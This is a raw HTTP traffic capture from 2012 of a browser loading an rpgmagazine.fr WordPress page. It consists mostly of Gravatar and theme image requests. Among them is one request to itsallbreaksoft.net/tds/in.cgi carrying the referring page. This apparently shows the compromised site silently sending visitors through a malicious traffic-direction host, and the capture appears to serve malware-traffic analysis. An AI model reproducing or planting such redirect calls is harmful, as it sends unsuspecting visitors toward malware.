Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237659
Content-Length: 3585
GET /avatar/6be2520734c1eacfe6ee69468bd30f49?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/6be2520734c1eacfe6ee69468bd30f49?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3462922571
Content-Length: 4960
GET /avatar/bcab573022760a6e4c09ed79698dc246?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/bcab573022760a6e4c09ed79698dc246?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237664
Content-Length: 5156
GET /avatar/c402a4d5571febc69a7e790a22ffc8d2?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/c402a4d5571febc69a7e790a22ffc8d2?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 679084863
Content-Length: 7192
GET /site/wp-content/themes/eGamer/images/pages-bg-left.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 00:26:35 GMT
Etag: &quot;183830b-ba-461f8b94604c0&quot;
Accept-Ranges: bytes
Content-Length: 186
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/pages-bg.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 00:26:35 GMT
Etag: &quot;183830d-69-461f8b94604c0&quot;
Accept-Ranges: bytes
Content-Length: 105
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/categories-line.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:23:51 GMT
Etag: &quot;18382f8-7c-461f3a809bbc0&quot;
Accept-Ranges: bytes
Content-Length: 124
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/dropdown-bottom.png HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Content-Length: 254
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/categories-bg.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:23:50 GMT
Etag: &quot;18382f7-49-461f3a7fa7980&quot;
Accept-Ranges: bytes
Content-Length: 73
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/content-bg.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:35 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:23:55 GMT
Etag: &quot;1838303-b0-461f3a846c4c0&quot;
Accept-Ranges: bytes
Content-Length: 176
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/category-post-bg.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:35 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:23:51 GMT
Etag: &quot;18382f9-bc-461f3a809bbc0&quot;
Accept-Ranges: bytes
Content-Length: 188
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /tds/in.cgi?3&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&default_keyword=notdefine HTTP/1.1

Host: itsallbreaksoft.net
GET /tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
Cookie: SessionID=a93fc49b-9ccf-4aca-bd91-bbcaa7de4e08; VisitorID=ff005920-a7fc-4f99-a824-5d985bf27bf3&amp;Exp=11/6/2015 3:50:36 AM
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP=&quot;CAO PSA OUR&quot;
Set-Cookie: SessionID=a93fc49b-9ccf-4aca-bd91-bbcaa7de4e08; path=/ VisitorID=ff005920-a7fc-4f99-a824-5d985bf27bf3&amp;Exp=11/6/2015 3:50:36 AM; expires=Fri, 06-Nov-2015 11:50:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Nov 2012 11:50:36 GMT
Content-Length: 3484
GET /site/wp-content/themes/eGamer/images/post-title-bg-2.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:35 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 00:26:35 GMT
Etag: &quot;183830e-65f-461f8b94604c0&quot;
Accept-Ranges: bytes
Content-Length: 1631
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/comment-bg.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:35 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:23:52 GMT
Etag: &quot;18382fb-1e9-461f3a818fe00&quot;
Accept-Ranges: bytes
Content-Length: 489
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /avatar/941fc0d34da3f85a3db8ca031d3f3a5e?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/941fc0d34da3f85a3db8ca031d3f3a5e?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E0)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237668
Content-Length: 6812
GET /avatar/16426f6b9d326c00edfc320d665a847b?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/16426f6b9d326c00edfc320d665a847b?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995784
Content-Length: 4466
GET /avatar/8dc1b0c388deaf81db17ead0a71cf162?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/8dc1b0c388deaf81db17ead0a71cf162?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119158
Content-Length: 6131
GET /avatar/b15fcc1973ea890c9e73087268675024?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b15fcc1973ea890c9e73087268675024?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EA)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237697
Content-Length: 6416
GET /avatar/923296d70f199cd19b61473ffb9a5bcf?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/923296d70f199cd19b61473ffb9a5bcf?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448285
Content-Length: 3822
GET /avatar/f41b336c277c1f7461f63e57158ad72a?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/f41b336c277c1f7461f63e57158ad72a?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718373
Content-Length: 5572
GET /avatar/b21a84510549e5896f4eeb14f7d452b9?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b21a84510549e5896f4eeb14f7d452b9?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46DE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448290
Content-Length: 3993
GET /avatar/b23b024b7a967278d64fb95f53a4e3a3?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b23b024b7a967278d64fb95f53a4e3a3?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331663
Content-Length: 4146
GET /avatar/a6f3cb6703ff1a3f9b9055d7e4322736?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/a6f3cb6703ff1a3f9b9055d7e4322736?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817979
Content-Length: 4715
GET /avatar/32aa1eaa14e9ec00e20cd78c42e2e6af?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/32aa1eaa14e9ec00e20cd78c42e2e6af?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3903698509
Content-Length: 6115
GET /avatar/85f3a5d335e4d0875e09c11d11673ae1?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/85f3a5d335e4d0875e09c11d11673ae1?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46DE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460272870
Content-Length: 4935
GET /avatar/143c653406148e242fb306e60840d376?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/143c653406148e242fb306e60840d376?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3903698510
Content-Length: 6460
GET /avatar/7a623be47882b35c5d85cf4e989270ed?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/7a623be47882b35c5d85cf4e989270ed?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448395
Content-Length: 5642
GET /avatar/c52655809f0abb440e31c3a118f35ff8?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/c52655809f0abb440e31c3a118f35ff8?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119198
Content-Length: 3789
GET /site/wp-content/themes/eGamer/images/comment-top.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:35 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
